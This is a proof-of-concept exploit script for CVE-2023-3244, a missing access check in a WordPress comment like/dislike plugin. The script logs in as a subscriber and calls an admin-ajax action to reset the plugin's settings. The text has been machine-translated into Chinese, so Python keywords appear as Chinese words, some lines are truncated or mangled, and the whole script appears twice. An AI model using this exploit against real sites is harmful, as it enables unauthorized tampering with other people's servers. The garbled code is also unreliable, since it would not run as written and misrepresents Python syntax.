#利用标题: POC-CVE-2023-3244
#日期: 9/12/2023
#利用作者: Diaa Hanna
#软件link: [如果可用,下载链接]
#版本:=1.2.0评论like-dislike
#测试在: 1.1.6评论like-dislike
#CVE : CVE-2023-3244
#参考
#https://nvd.nist.gov/vuln/detail/cve-2023-3244
#像WordPress的不喜欢插件这样的评论已被发现具有易于修改数据的漏洞。由于对Restore_settings函数的功能检查缺少,因此出现了此漏洞,该功能通过AJAX操作调用。该漏洞会影响插件的1.2.0的版本。
#此安全缺陷使经过验证的攻击者具有最小的权限,例如订户,以重置插件的设置。重要的是要注意,此问题仅在版本1.2.0中部分修补,因为订户级用户仍然可以访问NONCE(安全措施)。
#有关此错误的更多详细信息,您可以在[CVE-2023-3244](3https://NVD.NIST.GOV/VULN/DETAIL/DETAIL/DETAIL/CVE-2023-3244)上参考国家漏洞数据库(NVD)网站。
导入请求
导入argparse
导入系统
从Colorama进口
parser=argparse.argumentparser(prog='poc-cve-2023-3244',description='这是CVE-2023-3244的概念验证,这是Restore_settings函数中的访问控制漏洞
parser.add_argument(' - u',' - username',help='用户在WordPress上的用户名'
parser.add_argument(' - p',' - password',help='wordpress在具有低特权的用户的密码',必需=true)
parser.add_argument(' - url',help='脆弱服务器的URL(带有http或https)',必需=true)
parser.add_argument(' - nossl',help='disable ssl验证',action='store_true',必需=false,default=false)
args=parser.parse_args()
#检查域以'/'结束
url=args.url
如果URL [-1]!='/':
URL+='/'
wp_login=f'{url} wp-login.php'
wp_admin=f'{url} wp-admin/'
用户名=args.username
password=args.password
session=requests.session()
#插入
session.post(wp_login,headers={'cookie':'wordpress_test_cookie=wp cookie check'},data={'log':username,'pwd'
ass
'redirect_to':wp_admin,'testCookie':'1'},verify=not(args.nossl))
#如果未能登录
如果len(session.cookies.get_dict())==2:
打印(fore.red +'错误记录在检查您的用户名和密码中,然后重试')
sys.exit(1)
#将ajax请求发送到wp_ajax_cld_settings_restore_action此行将调用reterore_settings函数
#Restore_settings函数未检查登录用户的足够特权
#订户可以使用此POC
响应=session.get(f'{wp_admin}/admin-ajax.php?action=cld_settings_restore_action'saction'ctrify=not(args.nossl))
如果响应=='设置成功恢复。
打印(Fore.green +'成功筋疲力尽')
打印(fore.yellow+'类似评论的dislike插件的设置应在服务器上默认为')
sys.exit(0)
其他:
打印(fore.red +'发生了一些错误,请阅读POC的源代码,无论如何都不长')
sys.exit(1)
#日期: 9/12/2023
#利用作者: Diaa Hanna
#软件link: [如果可用,下载链接]
#版本:=1.2.0评论like-dislike
#测试在: 1.1.6评论like-dislike
#CVE : CVE-2023-3244
#参考
#https://nvd.nist.gov/vuln/detail/cve-2023-3244
#像WordPress的不喜欢插件这样的评论已被发现具有易于修改数据的漏洞。由于对Restore_settings函数的功能检查缺少,因此出现了此漏洞,该功能通过AJAX操作调用。该漏洞会影响插件的1.2.0的版本。
#此安全缺陷使经过验证的攻击者具有最小的权限,例如订户,以重置插件的设置。重要的是要注意,此问题仅在版本1.2.0中部分修补,因为订户级用户仍然可以访问NONCE(安全措施)。
#有关此错误的更多详细信息,您可以在[CVE-2023-3244](3https://NVD.NIST.GOV/VULN/DETAIL/DETAIL/DETAIL/CVE-2023-3244)上参考国家漏洞数据库(NVD)网站。
导入请求
导入argparse
导入系统
从Colorama进口
parser=argparse.argumentparser(prog='poc-cve-2023-3244',description='这是CVE-2023-3244的概念验证,这是Restore_settings函数中的访问控制漏洞
parser.add_argument(' - u',' - username',help='用户在WordPress上的用户名'
parser.add_argument(' - p',' - password',help='wordpress在具有低特权的用户的密码',必需=true)
parser.add_argument(' - url',help='脆弱服务器的URL(带有http或https)',必需=true)
parser.add_argument(' - nossl',help='disable ssl验证',action='store_true',必需=false,default=false)
args=parser.parse_args()
#检查域以'/'结束
url=args.url
如果URL [-1]!='/':
URL+='/'
wp_login=f'{url} wp-login.php'
wp_admin=f'{url} wp-admin/'
用户名=args.username
password=args.password
session=requests.session()
#插入
session.post(wp_login,headers={'cookie':'wordpress_test_cookie=wp cookie check'},data={'log':username,'pwd'

'redirect_to':wp_admin,'testCookie':'1'},verify=not(args.nossl))
#如果未能登录
如果len(session.cookies.get_dict())==2:
打印(fore.red +'错误记录在检查您的用户名和密码中,然后重试')
sys.exit(1)
#将ajax请求发送到wp_ajax_cld_settings_restore_action此行将调用reterore_settings函数
#Restore_settings函数未检查登录用户的足够特权
#订户可以使用此POC
响应=session.get(f'{wp_admin}/admin-ajax.php?action=cld_settings_restore_action'saction'ctrify=not(args.nossl))
如果响应=='设置成功恢复。
打印(Fore.green +'成功筋疲力尽')
打印(fore.yellow+'类似评论的dislike插件的设置应在服务器上默认为')
sys.exit(0)
其他:
打印(fore.red +'发生了一些错误,请阅读POC的源代码,无论如何都不长')
sys.exit(1)